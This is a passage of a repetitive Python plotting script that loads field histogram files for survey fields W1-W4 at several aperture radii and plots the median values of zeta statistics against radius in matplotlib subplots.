np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(453)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(453)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{z}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\n\ncols=7\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(454)\nrangemax=3\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(454)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 4\n\ncols=9\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.subplot(456)\nrangemax=6\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nax=plt.subplot(456)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_{M^2}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 5\n\ncols=11\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], 